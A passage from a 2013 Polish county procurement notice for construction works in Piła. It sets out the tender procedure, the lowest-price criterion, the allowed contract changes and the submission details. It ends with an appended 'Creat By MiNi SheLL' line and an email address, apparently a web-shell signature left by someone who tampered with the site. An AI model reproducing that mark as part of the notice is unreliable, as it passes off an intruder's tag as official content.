5.	Dowód wniesienia wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Do wykonywania samodzielnych funkcji przy realizacji robót, Wykonawca zatrudni personel wymieniony w załączonym do oferty wykazie podstawowego personelu, lub inny personel zaaprobowany przez Zamawiającego. Zaaprobuje on każde proponowane zastąpienie podstawowego personelu jedynie wtedy, kiedy odnośne kwalifikacje i zdolności proponowanego personelu, będą takie same lub wyższe niż personelu wymienionego w wykazie.
2.	Zamawiający dopuszcza możliwość wystąpienia w trakcie realizacji zamówienia konieczności wykonania robót zamiennych w stosunku do przewidzianych w przedmiarach robót (kosztorysach ofertowych) w sytuacji, gdy wykonanie tych robót będzie niezbędne do prawidłowego tj. zgodnego z zasadami wiedzy technicznej wykonania zamówienia.  
3.	Zamawiający dopuszcza możliwość ograniczenia zakresu rzeczowego robót w sytuacji, gdy wykonanie danych robót będzie zbędne do prawidłowego tj. zgodnego z zasadami wiedzy technicznej wykonania zamówienia. 
4.	Wszelkie inne rodzaje robót niż ujęte w przedmiarach robót oraz zwiększenia w porównaniu z przedmiarami robót a niezbędne do prawidłowego tj. zgodnego z zasadami wiedzy technicznej wykonania zamówienia Zamawiający będzie traktował jako roboty dodatkowe i Zamawiający musi złożyć dodatkowe zamówienie na ich wykonanie, w trybie wynikającym z art. 67 ust. 1 pkt. 5 ustawy Prawo zamówień publicznych.
5.	Podstawą do wykonania lub zaniechania robót, o których mowa w ust. 1 - 3 są protokoły konieczności potwierdzone przez projektanta i inspektora nadzoru inwestorskiego oraz zatwierdzone przez Zamawiającego.
6.	Dopuszcza się zmianę rozwiązań technicznych na podstawie protokołu uzgodnień, zaakceptowanego przez Zamawiającego. Zmiany zostaną wprowadzone do projektu powykonawczego.
7.	W przypadku gdy określone w ust. 5 zmiany spowodują wzrost kosztów inwestycji traktuje się je jako roboty dodatkowe i Zamawiający musi złożyć dodatkowe zamówienie na ich wykonanie, w trybie wynikającym z art.67 ust. 1 pkt 5 ustawy Prawo zamówień publicznych.
8.	Wydłużenie terminu wykonywania robót może nastąpić w przypadku:
1)	wystąpienia niesprzyjających warunków atmosferycznych, uniemożliwiających realizację robót budowlanych,
2)	wystąpienia konieczności wykonania robót dodatkowych,
3)	wystąpienia kolizji z planowanym lub realizowanym przez inny podmiot zadaniem.  
9.	Wynagrodzenie Wykonawcy ulegnie zwiększeniu lub zmniejszeniu w przypadku, gdy będzie wynikać to z kosztorysu na roboty zamienne lub kosztorysu na roboty zaniechane, o których mowa w § 29 ust. 3 umowy.
9.	Zmiana postanowień umowy może być dokonana tylko w formie pisemnego aneksu, pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.pila.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Pile
Al. Niepodległości 33/35
64-920 Piła
pokój 320.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.07.2013 godzina 10:00, miejsce: Starostwo Powiatowe w Pile
Al. Niepodległości 33/35
64-920 Piła
pokój 111.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com